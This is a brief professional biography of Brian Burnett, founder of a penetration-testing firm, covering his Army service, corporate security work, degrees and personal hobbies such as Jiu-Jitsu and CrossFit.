Brian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.
